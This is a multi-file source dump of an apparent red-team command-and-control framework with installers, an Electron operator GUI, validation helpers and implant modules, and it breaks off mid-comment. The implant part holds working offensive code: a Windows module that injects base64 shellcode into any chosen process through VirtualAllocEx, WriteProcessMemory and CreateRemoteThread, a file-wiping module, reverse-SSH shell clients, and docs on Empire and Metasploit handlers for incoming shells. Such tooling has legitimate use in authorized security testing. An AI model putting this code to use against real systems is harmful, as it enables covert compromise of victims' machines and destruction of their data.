warning:: 37 | For the moment these SSH are not fully interactive 38 | 39 | Reverse RDESKTOP 40 | -------------------------------------------------- 41 | 42 | TBD 43 | 44 | 45 | Empire, Metasploit 46 | -------------------------------------------------- 47 | 48 | .. figure:: ../_static/images/deployment/msftworking.png 49 | :align: right 50 | :figwidth: 300px 51 | :target: ../_static/images/deployment/msftworking.png 52 | 53 | Similarly to the reverse SSH server, Empire and MSFT will create remote handlers to receive incoming shells. 54 | ***The handler is configured with https self signed certificates.*** 55 | You can choose the handler port 56 | 57 | -------------------------------------------------------------------------------- /installConfig/instScriptNoDarwin.sh: -------------------------------------------------------------------------------- 1 | #Terraform Configs 2 | sudo cp /usr/local/STHive/sources/src/infra/.terraformrc /root/.terraformrc 3 | 4 | #Modified Golang Source Code Dependencies 5 | #crypto/tls 6 | #cp /usr/local/STHive/sources/src/rebugo/tls/* /usr/local/STHive/sources/go/src/crypto/tls/. 7 | #golang.org/x/oauth2 8 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/oauth2.go /usr/local/STHive/sources/src/golang.org/x/oauth2/. 9 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/token.go /usr/local/STHive/sources/src/golang.org/x/oauth2/. 10 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/internal/token.go /usr/local/STHive/sources/src/golang.org/x/oauth2/internal/. 11 | #google.golang.org/api/gmail/v1 12 | #cp /usr/local/STHive/sources/src/rebugo/gmail/v1/gmail-gen.go /usr/local/STHive/sources/src/google.golang.org/api/gmail/v1/. 
13 | 14 | #Objective-C/Cocoa Cross-Compilation:darwin - osxcross 15 | #sudo wget https://github.com/tpoechtrager/osxcross/archive/master.zip 16 | #sudo unzip master.zip 17 | #sudo mv osxcross-master/ /usr/local/STHive/sources/osxcross 18 | #sudo mv /usr/local/STHive/MacOSX10.13.sdk.tar.xz /usr/local/STHive/sources/osxcross/tarballs/ 19 | #sudo rm master.zip 20 | #cd /usr/local/STHive/sources/osxcross/ 21 | #sudo bash ./tools/get_dependencies.sh 22 | #sudo yes | sudo ./build.sh 23 | 24 | #Dependencies for windows c++ code 25 | sudo mkdir /usr/local/STHive/sources/winDependencies 26 | sudo unzip /usr/local/STHive/windependencies.zip -d /usr/local/STHive/sources/winDependencies 27 | 28 | #Hive Service Configs 29 | sudo chmod +x /usr/local/STHive/hive 30 | sudo cp /usr/local/STHive/hive.service /etc/systemd/system/ 31 | sudo chmod 664 /etc/systemd/system/hive.service 32 | sudo systemctl daemon-reload 33 | sudo systemctl enable hive.service 34 | sudo chown root:root -R /usr/local/STHive/ 35 | cd /usr/local/STHive/ 36 | HIVEIP=$(curl http://169.254.169.254/latest/meta-data/public-ipv4) 37 | sqlite3 ./ST.db < 2 |
3 |
4 |
5 |

Domain

6 | 12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 29 | 32 | 35 | 38 | 39 | 40 |
NameTypeActiveDomain
27 | 28 | 30 | 31 | 33 | 34 | 36 | 37 |
41 |
42 |
43 |
44 | 45 | 46 |
47 | 48 | Delete Domain 49 |
50 |
51 | 52 | -------------------------------------------------------------------------------- /installConfig/instScript.sh: -------------------------------------------------------------------------------- 1 | 2 | #After the "hive.tf" plan is finished, there are still some actions to prform within the Hive Server, this script will execute the 3 | #rest of needed commands 4 | 5 | 6 | #Terraform Configs 7 | sudo cp /usr/local/STHive/sources/src/infra/.terraformrc /root/.terraformrc 8 | 9 | #Modified Golang Source Code Dependencies 10 | #crypto/tls 11 | #cp /usr/local/STHive/sources/src/rebugo/tls/* /usr/local/STHive/sources/go/src/crypto/tls/. 12 | #golang.org/x/oauth2 13 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/oauth2.go /usr/local/STHive/sources/src/golang.org/x/oauth2/. 14 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/token.go /usr/local/STHive/sources/src/golang.org/x/oauth2/. 15 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/internal/token.go /usr/local/STHive/sources/src/golang.org/x/oauth2/internal/. 16 | #google.golang.org/api/gmail/v1 17 | #cp /usr/local/STHive/sources/src/rebugo/gmail/v1/gmail-gen.go /usr/local/STHive/sources/src/google.golang.org/api/gmail/v1/. 
18 | 19 | #Objective-C/Cocoa Cross-Compilation:darwin - osxcross 20 | sudo wget https://github.com/tpoechtrager/osxcross/archive/master.zip 21 | sudo unzip master.zip 22 | sudo mv osxcross-master/ /usr/local/STHive/sources/osxcross 23 | sudo mv /usr/local/STHive/MacOSX10.13.sdk.tar.xz /usr/local/STHive/sources/osxcross/tarballs/ 24 | sudo rm master.zip 25 | cd /usr/local/STHive/sources/osxcross/ 26 | sudo bash ./tools/get_dependencies.sh 27 | sudo yes | sudo ./build.sh 28 | 29 | #Dependencies for windows c++ code 30 | sudo mkdir /usr/local/STHive/sources/winDependencies 31 | sudo unzip /usr/local/STHive/windependencies.zip -d /usr/local/STHive/sources/winDependencies 32 | 33 | #Hive Service Configs 34 | sudo chmod +x /usr/local/STHive/hive 35 | sudo cp /usr/local/STHive/hive.service /etc/systemd/system/ 36 | sudo chmod 664 /etc/systemd/system/hive.service 37 | sudo systemctl daemon-reload 38 | sudo systemctl enable hive.service 39 | sudo chown root:root -R /usr/local/STHive/ 40 | cd /usr/local/STHive/ 41 | HIVEIP=$(curl http://169.254.169.254/latest/meta-data/public-ipv4) 42 | sqlite3 ./ST.db < 20 | */ 21 | import "C" 22 | 23 | 24 | type BiMigrate struct { 25 | Shellcode string `json:"shellcode"` 26 | Pid string `json:"pid"` 27 | } 28 | 29 | var moduleParams *BiMigrate 30 | 31 | 32 | func Migrate(jsonMigrate string) (bool,string){ 33 | 34 | errDaws := json.Unmarshal([]byte(jsonMigrate),&moduleParams) 35 | if errDaws != nil{ 36 | return true,"Error Decoding Migrate Module Params:" + errDaws.Error() 37 | } 38 | 39 | //Decode Binary shellcode string 40 | shellcodeBin,errDecode := base64.StdEncoding.DecodeString(moduleParams.Shellcode) 41 | if errDecode != nil { 42 | return true,"Error b64 decoding shellcode" 43 | } 44 | 45 | 46 | //Extract PID from migrate params 47 | arguments := strings.Split(moduleParams.Pid," ") 48 | if len(arguments) != 1 { 49 | return true,"Incorrect Number of params for Migration" 50 | } 51 | 52 | var ptrShellcode *C.char = 
C.CString(string(shellcodeBin)) 53 | defer C.free(unsafe.Pointer(ptrShellcode)) 54 | 55 | var size_shellcode C.int = C.int(len(shellcodeBin)) 56 | 57 | i, err := strconv.Atoi(arguments[0]) 58 | if err != nil { 59 | return true,"Incorrect Integer for PID within Migration command" 60 | } 61 | 62 | var pid C.int = C.int(i) 63 | 64 | ptrError := C.malloc(C.sizeof_char * 1024) 65 | defer C.free(unsafe.Pointer(ptrError)) 66 | 67 | error := C.Migrate((*C.char)(ptrShellcode),size_shellcode,pid,(*C.char)(ptrError)) 68 | 69 | errorString := C.GoString((*C.char)(ptrError)) 70 | if (error != 1){ 71 | 72 | return true,"Migrate Error:" + string(errorString) 73 | } 74 | 75 | return false,"Migration Completed" 76 | } 77 | -------------------------------------------------------------------------------- /stime.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Installer: 4 | # 5 | # installConfig/ 6 | # config.txt 7 | # hive.tf 8 | # installSTime.sh --> Will just work over installConfig folder 9 | # 1. Read properties of config.txt and create variables 10 | # 2. Parse/Prepare hive.tf 11 | # 3. 
Use terraform to deploy hive to VPS 12 | 13 | 14 | 15 | # Check if an installation already exists 16 | 17 | case "$1" in 18 | 19 | "remove" ) 20 | cd ./installConfig/ 21 | rm stclient 22 | rm -rf electronGUI 23 | rm -rf go* 24 | rm -rf vpskeys/* 25 | rm -rf reports/* 26 | rm -rf downloads/* 27 | rm -rf ../src/github.com/ 28 | rm -rf ../src/golang.org/ 29 | rm -rf ../src/google.golang.org/ 30 | rm -rf ../src/go.opencensus.io/ 31 | rm -rf ../src/cloud.google.com/ 32 | rm -rf ../pkg 33 | rm -rf npm-debug.log 34 | ;; 35 | 36 | 37 | "install" ) 38 | 39 | #Prepare User inputs to install client 40 | USERNAME=$2 41 | PASSWORD=$3 42 | HASH=$(htpasswd -bnBC 14 "" ${PASSWORD} | tr -d ':\n') 43 | HIVIP=$4 44 | HIVPORT=$5 45 | CLIENTPORT=$6 46 | HIVTLSHASH=$7 47 | 48 | #Required Software to compile client 49 | sudo apt-get update 50 | sudo apt-get install gcc unzip 51 | 52 | # Download GO and Compile Hive 53 | wget https://golang.org/dl/go1.16.linux-amd64.tar.gz -P ./installConfig/ 54 | tar xvf ./installConfig/go1.16.linux-amd64.tar.gz -C ./installConfig/ 55 | export GOROOT="$(pwd)/installConfig/go/" 56 | export GOPATH="$(pwd)" 57 | 58 | #Compile client with target variables and prepare electron front-end 59 | cd ./installConfig 60 | GO111MODULE=off ./go/bin/go get "github.com/gorilla/mux" 61 | GO111MODULE=off GOOS=linux GOARCH=amd64 ./go/bin/go build --ldflags "-X main.username=${USERNAME} -X main.password=${PASSWORD} -X main.roasterString=${HIVIP}:${HIVPORT} -X main.fingerPrint=${HIVTLSHASH} -X main.clientPort=${CLIENTPORT}" -o stclient client 62 | 63 | 64 | cp -r ../src/client/electronGUI/ . 65 | cd electronGUI/ 66 | find . 
-type f | xargs sed -i "s/127\.0\.0\.1:8000/127\.0\.0\.1:${CLIENTPORT}/g" 67 | sudo apt-get install -y npm 68 | npm install 69 | 70 | exit 1 71 | ;; 72 | 73 | *) cd ./installConfig/ 74 | ./stclient & 75 | sleep 20s 76 | cd electronGUI 77 | npm start 78 | pkill stclient 79 | exit 1 80 | ;; 81 | esac 82 | 83 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_remote_thread_windows/migrate_remote_thread_windows_x64.go: -------------------------------------------------------------------------------- 1 | // +build amd64 2 | 3 | package migrate_remote_thread_windows 4 | 5 | import ( 6 | 7 | //"fmt" 8 | //"io/ioutil" 9 | //"os" 10 | "unsafe" 11 | "encoding/json" 12 | "strings" 13 | "strconv" 14 | "encoding/base64" 15 | ) 16 | 17 | 18 | /* 19 | #cgo CXXFLAGS: -I"../../../../../winDependencies/includes/" 20 | #cgo LDFLAGS: -L"../../../../../winDependencies/libs/x64/" -static 21 | #include "migrate_remote_thread_windows.h" 22 | #include 23 | */ 24 | import "C" 25 | 26 | 27 | type BiMigrate struct { 28 | Shellcode string `json:"shellcode"` 29 | Pid string `json:"pid"` 30 | } 31 | 32 | var moduleParams *BiMigrate 33 | 34 | 35 | func Migrate(jsonMigrate string) (bool,string){ 36 | 37 | errDaws := json.Unmarshal([]byte(jsonMigrate),&moduleParams) 38 | if errDaws != nil{ 39 | return true,"Error Decoding Migrate Module Params:" + errDaws.Error() 40 | } 41 | 42 | //Decode Binary shellcode string 43 | shellcodeBin,errDecode := base64.StdEncoding.DecodeString(moduleParams.Shellcode) 44 | if errDecode != nil { 45 | return true,"Error b64 decoding shellcode" 46 | } 47 | 48 | 49 | //Extract PID from migrate params 50 | arguments := strings.Split(moduleParams.Pid," ") 51 | if len(arguments) != 1 { 52 | return true,"Incorrect Number of params for Migration" 53 | } 54 | 55 | var ptrShellcode *C.char = C.CString(string(shellcodeBin)) 56 | defer C.free(unsafe.Pointer(ptrShellcode)) 57 | 58 | var size_shellcode C.int = 
C.int(len(shellcodeBin)) 59 | 60 | i, err := strconv.Atoi(arguments[0]) 61 | if err != nil { 62 | return true,"Incorrect Integer for PID within Migration command" 63 | } 64 | 65 | var pid C.int = C.int(i) 66 | 67 | ptrError := C.malloc(C.sizeof_char * 1024) 68 | defer C.free(unsafe.Pointer(ptrError)) 69 | 70 | error := C.Migrate((*C.char)(ptrShellcode),size_shellcode,pid,(*C.char)(ptrError)) 71 | 72 | errorString := C.GoString((*C.char)(ptrError)) 73 | if (error != 1){ 74 | 75 | return true,"Migrate Error:" + string(errorString) 76 | } 77 | 78 | return false,"Migration Completed" 79 | } 80 | -------------------------------------------------------------------------------- /src/tools/tools.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Tools Main Function }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 3 | /* 4 | Sources: 5 | https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ 6 | https://gist.github.com/napicella/777e83c0ef5b77bf72c0a5d5da9a4b4e 7 | */ 8 | 9 | package main 10 | 11 | import ( 12 | 13 | "io" 14 | "os" 15 | "net" 16 | "golang.org/x/crypto/ssh/terminal" 17 | "fmt" 18 | ) 19 | 20 | func main() { 21 | 22 | if (len(os.Args) < 2){ 23 | fmt.Println("Not Enough Arguments") 24 | return 25 | } 26 | 27 | switch os.Args[1]{ 28 | 29 | case "revsshclientLinDar": 30 | _,result := ConnectRevSshShellLinDarwin("127.0.0.1",os.Args[2]) 31 | fmt.Println(result) 32 | 33 | case "revsshclientClassicCMD": 34 | _,result := ConnectRevSshClassicCMD("127.0.0.1",os.Args[2]) 35 | fmt.Println(result) 36 | default: 37 | fmt.Println("Not Toolset Command") 38 | } 39 | 40 | } 41 | 42 | func ConnectRevSshShellLinDarwin(domain string,port string) (bool,string){ 43 | 44 | // connect to this socket 45 | conn, e := net.Dial("tcp", domain+":"+port) 46 | if e != nil { 47 | return true,"Error connecting ssh socket: "+e.Error() 48 | } 49 | 50 | // MakeRaw put the terminal connected 
to the given file descriptor into raw 51 | // mode and returns the previous state of the terminal so that it can be 52 | // restored. 53 | oldState, e := terminal.MakeRaw(int(os.Stdin.Fd())) 54 | if e != nil { 55 | return true,"Error making raw terminal: "+e.Error() 56 | } 57 | defer func() { _ = terminal.Restore(int(os.Stdin.Fd()), oldState) }() 58 | 59 | go func() { _, _ = io.Copy(os.Stdout, conn) }() 60 | _, e = io.Copy(conn, os.Stdin) 61 | 62 | return false,"Session Finished" 63 | 64 | } 65 | 66 | func ConnectRevSshClassicCMD(domain string,port string) (bool,string){ 67 | 68 | // connect to this socket 69 | conn, e := net.Dial("tcp", domain+":"+port) 70 | if e != nil { 71 | return true,"Error connecting ssh socket: "+e.Error() 72 | } 73 | 74 | go func() { _, _ = io.Copy(os.Stdout, conn) }() 75 | _, e = io.Copy(conn, os.Stdin) 76 | 77 | return false,"Session Finished" 78 | 79 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createStaging.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Generate Staging

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 | 17 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 36 | 40 | 41 |
VPSDomain
33 | 35 | 37 | 39 |
42 |
43 |
44 | 45 |
46 | 47 |
48 |
49 |
50 |
51 | 52 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/wipef_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "math" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | /* 12 | Description: Wipe File--> Linux,Darwin,Windows. 13 | Flow: 14 | A.Wipe target PATH File. 15 | */ 16 | func Wipe(commands string) (bool,string){ 17 | 18 | arguments := strings.Split(commands," ") 19 | if len(arguments) != 1 { 20 | return true,"Incorrect Number of params" 21 | } 22 | 23 | var targetFile = arguments[0] 24 | 25 | // make sure we open the file with correct permission 26 | // otherwise we will get the 27 | // bad file descriptor error 28 | file, err := os.OpenFile(targetFile, os.O_RDWR, 0666) 29 | 30 | if err != nil { 31 | return true,"Error Opening File to wipe: "+ err.Error() 32 | } 33 | 34 | defer file.Close() 35 | 36 | // find out how large is the target file 37 | fileInfo, err := file.Stat() 38 | if err != nil { 39 | return true,"Error Opening File to wipe: "+ err.Error() 40 | } 41 | 42 | // calculate the new slice size 43 | // base on how large our target file is 44 | 45 | var fileSize int64 = fileInfo.Size() 46 | const fileChunk = 1 * (1 << 20) // 1 MB, change this to your requirement 47 | 48 | // calculate total number of parts the file will be chunked into 49 | totalPartsNum := uint64(math.Ceil(float64(fileSize) / float64(fileChunk))) 50 | 51 | lastPosition := 0 52 | 53 | for i := uint64(0); i < totalPartsNum; i++ { 54 | 55 | partSize := int(math.Min(fileChunk, float64(fileSize-int64(i*fileChunk)))) 56 | partZeroBytes := make([]byte, partSize) 57 | 58 | // fill out the part with zero value 59 | copy(partZeroBytes[:], "0") 60 | 61 | // over write every byte in the chunk with 0 62 | _, err := file.WriteAt([]byte(partZeroBytes), int64(lastPosition)) 63 | 64 | if err != nil { 65 | return 
true,"Error Overwriting File to wipe: "+ err.Error() 66 | } 67 | 68 | // update last written position 69 | lastPosition = lastPosition + partSize 70 | } 71 | 72 | file.Close() 73 | // finally remove/delete our file 74 | err = os.Remove(targetFile) 75 | 76 | if err != nil { 77 | return true,"Error Removing File to wipe: "+ err.Error() 78 | } 79 | 80 | return false,"File Wiped" 81 | 82 | } -------------------------------------------------------------------------------- /src/client/electronGUI/main.js: -------------------------------------------------------------------------------- 1 | // Modules to control application life and create native browser window 2 | const {app, BrowserWindow} = require('electron') 3 | var path = require('path') 4 | 5 | // Keep a global reference of the window object, if you don't, the window will 6 | // be closed automatically when the JavaScript object is garbage collected. 7 | let mainWindow 8 | 9 | function createWindow () { 10 | // Create the browser window. 11 | mainWindow = new BrowserWindow({ 12 | //Activate Node Integration ofr load "require" libraries 13 | webPreferences: { 14 | nodeIntegration: true 15 | }, 16 | 17 | width: 1800, 18 | height: 1200, 19 | icon: path.join(__dirname, 'static/icons/png/STicon.png') 20 | 21 | }) 22 | 23 | // and load the index.html of the app. 24 | //mainWindow.loadFile('gentelella/production/myindex.html') 25 | mainWindow.loadFile('index.html') 26 | 27 | // Open the DevTools. 28 | // mainWindow.webContents.openDevTools() 29 | 30 | // Emitted when the window is closed. 31 | mainWindow.on('closed', function () { 32 | // Dereference the window object, usually you would store windows 33 | // in an array if your app supports multi windows, this is the time 34 | // when you should delete the corresponding element. 35 | mainWindow = null 36 | }) 37 | 38 | 39 | } 40 | 41 | // This method will be called when Electron has finished 42 | // initialization and is ready to create browser windows. 
43 | // Some APIs can only be used after this event occurs. 44 | app.on('ready', createWindow) 45 | 46 | 47 | // Quit when all windows are closed. 48 | app.on('window-all-closed', function () { 49 | // On macOS it is common for applications and their menu bar 50 | // to stay active until the user quits explicitly with Cmd + Q 51 | if (process.platform !== 'darwin') { 52 | app.quit() 53 | } 54 | }) 55 | 56 | app.on('activate', function () { 57 | // On macOS it's common to re-create a window in the app when the 58 | // dock icon is clicked and there are no other windows open. 59 | if (mainWindow === null) { 60 | createWindow() 61 | } 62 | }) 63 | 64 | // In this file you can include the rest of your app's specific main process 65 | // code. You can also put them in separate files and require them here. 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /src/client/clientMisc.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Client Miscelanious Functions and external sources }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 3 | 4 | package main 5 | 6 | import ( 7 | "time" 8 | "math/rand" 9 | //"strconv" 10 | "regexp" 11 | ) 12 | 13 | //// Extra functions to help Hive with different tasks: 14 | // A. randomString (from: https://www.calhoun.io/creating-random-strings-in-go/) 15 | func randomString(length int) string{ 16 | 17 | charset := "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 18 | var seededRand *rand.Rand = rand.New(rand.NewSource(time.Now().UnixNano())) 19 | b := make([]byte, length) 20 | for i := range b { 21 | b[i] = charset[seededRand.Intn(len(charset))] 22 | } 23 | 24 | return string(b) 25 | } 26 | 27 | 28 | // Some Input Sanitation Functions (to Improve...) 
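// Input allowlists for values the client sends to Hive. Hive keeps the same
// set in ./src/hive/hivMisc.go; keep the two in sync. Patterns are compiled
// once at package scope instead of on every call.
var (
	reAccessKeysInput = regexp.MustCompile(`^[a-zA-Z0-9\-\.\+_/=]{1,200}$`)
	reNamesInput      = regexp.MustCompile(`^[a-zA-Z0-9]{1,20}$`)
	reIDsInput        = regexp.MustCompile(`^[a-zA-Z0-9\-]{1,20}$`)
	reFilesInput      = regexp.MustCompile(`^[\w.-]{1,20}$`)
	reNumbersInput    = regexp.MustCompile(`^[0-9]{1,200}$`)
	// One label plus a TLD (example.com); subdomains do not match.
	reDomainsInput = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]\.[a-zA-Z]{2,}$`)
	// Dotted-quad IPv4 address, each octet 0-255.
	reIPv4Input = regexp.MustCompile(`^(?:(?:^|\.)(?:2(?:5[0-5]|[0-4]\d)|1?\d?\d)){4}$`)
	// Decimal TCP port 1-65535 with no leading zeros. The former pattern
	// rejected the valid ranges 60000-60999, 65000-65099, 65500-65509 and
	// 65530, and accepted zero-padded strings such as "0000".
	reTCPPortInput = regexp.MustCompile(`^([1-9][0-9]{0,3}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$`)
)

// gmailInputWhite accepts any input of at most 5000 bytes. Despite the name
// this is only a length cap, not a character allowlist.
func gmailInputWhite(input string) bool {
	return len(input) <= 5000
}

// accessKeysInputWhite accepts 1-200 characters from [a-zA-Z0-9-.+_/=].
func accessKeysInputWhite(input string) bool {
	return reAccessKeysInput.MatchString(input)
}

// rsaKeysInputWhite accepts any input of at most 5000 bytes. As with
// gmailInputWhite this is a length cap only; the key material is not inspected.
func rsaKeysInputWhite(input string) bool {
	return len(input) <= 5000
}

// namesInputWhite accepts 1-20 alphanumeric characters.
func namesInputWhite(input string) bool {
	return reNamesInput.MatchString(input)
}

// idsInputWhite accepts 1-20 alphanumeric characters or hyphens.
func idsInputWhite(input string) bool {
	return reIDsInput.MatchString(input)
}

// filesInputWhite accepts 1-20 characters from [\w.-]. Path separators are
// rejected, but ".." is accepted, so callers must not join the value into a
// filesystem path without their own check.
func filesInputWhite(input string) bool {
	return reFilesInput.MatchString(input)
}

// numbersInputWhite accepts 1-200 decimal digits.
func numbersInputWhite(input string) bool {
	return reNumbersInput.MatchString(input)
}

// domainsInputWhite accepts either a single-label domain with a TLD or a
// dotted-quad IPv4 address.
func domainsInputWhite(input string) bool {
	return reDomainsInput.MatchString(input) || reIPv4Input.MatchString(input)
}

// tcpPortInputWhite accepts a decimal TCP port in 1-65535 without leading
// zeros.
func tcpPortInputWhite(input string) bool {
	return reTCPPortInput.MatchString(input)
}
-------------------------------------------------------------------------------- /src/client/electronGUI/components/staging/staging.html: -------------------------------------------------------------------------------- 1 |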
2 |
3 |
4 |
5 |

Staging

6 | 12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 29 | 32 | 35 | 38 | 39 | 40 |
NameTypeVPSDomain
27 | 28 | 30 | 31 | 33 | 34 | 36 | 37 |
41 | 42 |
43 |
44 | 45 |
46 | 47 | 48 | 55 | 56 | 57 |
58 |
59 | 60 | 61 | 62 |
63 |
64 |
65 |
66 | 67 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_remote_thread_windows/migrate_remote_thread_windows.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include "migrate_remote_thread_windows.h" 3 | #include 4 | #include 5 | 6 | 7 | std::string GetLastErrorAsString() 8 | { 9 | //Get the error message ID, if any. 10 | DWORD errorMessageID = ::GetLastError(); 11 | if (errorMessageID == 0) { 12 | return std::string(); //No error message has been recorded 13 | } 14 | 15 | LPSTR messageBuffer = nullptr; 16 | 17 | //Ask Win32 to give us the string version of that message ID. 18 | //The parameters we pass in, tell Win32 to create the buffer that holds the message for us (because we don't yet know how long the message string will be). 19 | size_t size = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 20 | NULL, errorMessageID, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&messageBuffer, 0, NULL); 21 | 22 | //Copy the error message into a std::string. 23 | std::string message(messageBuffer, size); 24 | 25 | //Free the Win32's string's buffer. 
26 | LocalFree(messageBuffer); 27 | 28 | return message; 29 | } 30 | 31 | int Migrate(char* shellcode, int size_shellcode,int pid,char* error)//char* result,char* error) 32 | { 33 | 34 | HANDLE processHandle; 35 | HANDLE remoteThread; 36 | PVOID remoteBuffer; 37 | int writeRes; 38 | 39 | processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid)); 40 | if (processHandle == NULL){ 41 | DWORD dwError = GetLastError(); 42 | sprintf(error, "OpenProcess Error: %ld\n", dwError); 43 | return 0; 44 | } 45 | 46 | //processHandle = processInfo.hProcess; 47 | remoteBuffer = VirtualAllocEx(processHandle, NULL, size_shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 48 | if (remoteBuffer == NULL) { 49 | DWORD dwError = GetLastError(); 50 | sprintf(error, "VirtualAllocEx Error: %ld\n", dwError); 51 | return 0; 52 | } 53 | 54 | writeRes = WriteProcessMemory(processHandle, remoteBuffer, shellcode, size_shellcode, NULL); 55 | if (writeRes == 0) { 56 | DWORD dwError = GetLastError(); 57 | sprintf(error, "WriteProcessMemory Error: %ld\n", dwError); 58 | return 0; 59 | } 60 | 61 | remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); 62 | if (remoteThread == NULL) { 63 | DWORD dwError = GetLastError(); 64 | sprintf(error, "CreateRemoteThread Error: %ld\n", dwError); 65 | return 0; 66 | } 67 | 68 | /* 69 | if (CloseHandle(processHandle)) { 70 | DWORD dwError = GetLastError(); 71 | sprintf(error, "VirtualAllocEx Error: %ld", dwError); 72 | printf("CloseHandle Error: %ld\n", dwError); 73 | } 74 | */ 75 | 76 | return 1; 77 | } -------------------------------------------------------------------------------- /docs/install/dependencies.rst: -------------------------------------------------------------------------------- 1 | Dependencies 2 | =========================== 3 | 4 | 5 | Some of the modules and capabilities of Bichito are written using native libraries of target OS Devices. 
For the proper functioning of them, target OS dependencies need to be acquired. 6 | 7 | Why Dependencies? 8 | ------------------- 9 | 10 | SiestaTime is designed to generate implants for three platforms: **Linux,Windows and Darwin** 11 | It will use Go to compile the implants for target OS and architecture, but some of the implants functionalities require more specific dependencies. 12 | To do the "system level delicate stuff" SiestaTime will use ``cgo`` and ``C wrappers`` to call C++, Objective-C, which will require certain target OS dependencies (that will be statically linked in the compilation process of the implants). 13 | 14 | * Windows: ``CGO + MinGW`` 15 | 16 | * Darwin: ``CGO + OSXCross`` 17 | 18 | 19 | Get Dependencies from Windows 10 20 | -------------------------------------------- 21 | 22 | To properly install Hive a set of dependencies extracted from Windows need to be in place first. This will be necessary to be able to compile some implant modules for windows. The result of this step should be a zipped folder with the following structure: 23 | 24 | :: 25 | 26 | includes/ 27 | taskschd.h 28 | libs/ 29 | x86/ 30 | comsupp.lib 31 | x64/ 32 | comsupp.lib 33 | 34 | This zip needs to be placed: 35 | 36 | .. prompt:: bash $ 37 | 38 | ./SiestaTime/installConfig/windependencies.zip 39 | 40 | 41 | The command you can run for generating the resulting zip: 42 | 43 | .. prompt:: bash $ 44 | 45 | zip -r windependencies.zip * 46 | 47 | **Search for target dependencies** 48 | 49 | * Perform a clean Windows 10 Installation (EG. virtual machine) 50 | 51 | * Install microsoft visual studio community() with ``C++ Console apps Development`` 52 | 53 | .. figure:: ../_static/images/install/winsearch.png 54 | :align: right 55 | :figwidth: 300px 56 | :target: ../_static/images/install/winsearch.png 57 | 58 | .. 
figure:: ../_static/images/install/vsc.png 59 | :align: right 60 | :figwidth: 300px 61 | :target: ../_static/images/install/vsc.png 62 | 63 | 64 | 65 | * Copy target files keeping previous folder structure. You can just find the files on windows after Visual Studio with C++ support is installed (listed at ``./SiestaTime/installConfig/implant_dependencies.txt`` ) 66 | 67 | .. note:: 68 | A script will be provided in the future when dependency tree grow bigger 69 | 70 | Get Dependencies from Darwin (Mac OSX) 71 | -------------------------------------------------- 72 | 73 | 74 | A. Install XCode on MacOSX 10.13 75 | B. ``git clone https://github.com/tpoechtrager/osxcross`` 76 | C. Run osxcross extract script 77 | 78 | .. prompt:: bash $ 79 | 80 | ./tools/gen_sdk_package.sh 81 | 82 | 83 | 84 | D. Copy output file to ``SiestaTime/installConfig/MacOSX10.13.sdk.tar.xz`` 85 | 86 | .. note:: Since i386 has been dropped <= most ideally 10.13 of your Darwin OS should be used -------------------------------------------------------------------------------- /src/redirector/redBiComs.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Redirector Bichito Coms }}}}}}} 2 | 3 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 4 | package main 5 | 6 | import ( 7 | "fmt" 8 | ) 9 | 10 | /* 11 | This part of Redirector handles the queues and Slices for Jobs that come from Implants, or need to be sent to Implants. 12 | These functions will be consumed by the target Network module. 13 | Each time a bichito connect to a redirector, this will trigger a connection routine against Hive: ./src/redirector/redHivComs.go (connectHive) 14 | */ 15 | 16 | /* 17 | Description: Retrieve target bichitos Jobs from on memory slice (those that come from Hive and are ready to go) 18 | Flow: 19 | A. Start a new connection to retrieve/send data to Hive if not connection is already ongoing 20 | B. 
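Lock the on-memory slice of Jobs that come from Hive and need to be sent to their respective Implant.
   Selection and removal happen under the same lock, so a concurrent call for another BID cannot
   compact the slice underneath this one (positions captured without the lock went stale and could
   drop another bichito's jobs or redeliver this one's).
C. Loop over the slice, and retrieve the Jobs of the BID selected by the function
D. Compact the slice in place so the retrieved Jobs are gone before the lock is released
E. Return the data so the network module can deliver to the Bichito the jobs
*/
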